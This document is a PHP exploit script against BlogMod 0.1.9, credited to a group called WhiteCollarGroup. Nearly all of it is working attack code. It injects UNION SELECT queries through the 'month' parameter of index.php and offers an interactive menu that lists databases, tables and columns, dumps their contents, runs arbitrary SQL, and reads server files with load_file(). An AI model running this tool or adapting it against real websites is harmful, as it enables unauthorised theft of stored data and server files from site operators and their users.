<?php
/*
# Exploit Title: BlogMod <= 0.1.9 SQLi Exploit
# Date: 04th october 2012
# Exploit Author: WhiteCollarGroup
# Software Link: http://www.codigofonte.net/scripts/php/blog/367_blog-mod
# Version: 0.1.9
~> How does this exploit works?
It exploits one of the several SQL Injections in the system.
Specifiedly, in the file "index.php", parr "month".
Usage:
php filename.php
*/
function puts($str) {
echo $str."\n";
}
function gets() {
return trim(fgets(STDIN));
}
function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}
$token = uniqid();
$token_hex = hex($token);
puts("BlogMod <= X SQL Injection Exploit");
puts("By WhiteCollarGroup");
puts("[?] Enter website URL (e. g.: http://www.target.com/blogmod/):");
$target = gets();
puts("[*] Checking...");
if(!@file_get_contents($target)) die("[!] Access error: check domain and path.");
if(substr($target, (strlen($target)-1))!="/") $target .= "/";
function runquery($query) {
global $target,$token,$token_hex;
$query = preg_replace("/;$/", null, $query);
$query = urlencode($query);
$rodar = $target . "index.php?year=2012&month=-0%20union%20all%20select%201,2,concat%28$token_hex,%28$query%29,$token_hex%29,4,5,6--%20";
$get = file_get_contents($rodar);
$matches = array();
preg_match_all("/$token(.*)$token/", $get, $matches);
if(isset($matches[1][0]))
return $matches[1][0];
else
return false;
}
if(runquery("SELECT $token_hex")!=$token) {
// error
exit;
}
function main($msg=null) {
global $token,$token_hex;
echo "\n".$msg."\n";
puts("[>] MAIN MENU");
puts("[1] Browse MySQL");
puts("[2] Run SQL Query");
puts("[3] Read file");
puts("[4] About");
puts("[0] Exit");
$resp = gets();
if($resp=="0")
exit;
elseif($resp=="1") {
// pega dbs
$i = 0;
puts("[.] Getting databases:");
while(true) {
$pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;
$i++;
}
puts("[!] Current database: ".runquery("SELECT database()"));
puts("[?] Enter database name for select:");
$own = array();
$own['db'] = gets();
$own['dbh'] = hex($own['db']);
// pega tables da db
$i = 0;
puts("[.] Getting tables from $own[db]:");
while(true) {
$pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;
$i++;
}
puts("[?] Enter table name for select:");
$own['tb'] = gets();
$own['tbh'] = hex($own['tb']);
// pega colunas da table
$i = 0;
puts("[.] Getting columns from $own[db].$own[tb]:");
while(true) {
$pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;
$i++;
}
puts("[?] Enter columns name, separated by commas (\",\") for select:");
$own['cl'] = explode(",", gets());
// pega dados das colunas
foreach($own['cl'] as $coluna) {
$i = 0;
puts("[=] Column: $coluna");
while(true) {
$pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1");
if($pega) {
puts(" - $pega");
$i++;
} else
break;
}
echo "\n[ ] -+-\n";
}
main();
} elseif($resp=="2") {
puts("[~] RUN SQL QUERY");
puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
puts("[?] Query (enter for exit): ");
$query = gets();
if(!$query) main();
else main(runquery($query."\n"));
} elseif($resp=="3") {
puts("[?] File path (may not have priv):");
$file = hex(gets());
$le = runquery("SELECT load_file($file) AS wc");
if($le)
main($le);
else
main("File not found, empty or no priv!");
} elseif($resp=="4") {
puts("Coded by WhiteCollarGroup");
puts("www.wcgroup.host56.com");
puts("whitecollar_group@hotmail.com");
puts("twitter.com/WCollarGroup");
puts("facebook.com/WCollarGroup");
puts("wcollargroup.blogspot.com");
main();
}
else
main("[!] Wrong choice.");
}
main();
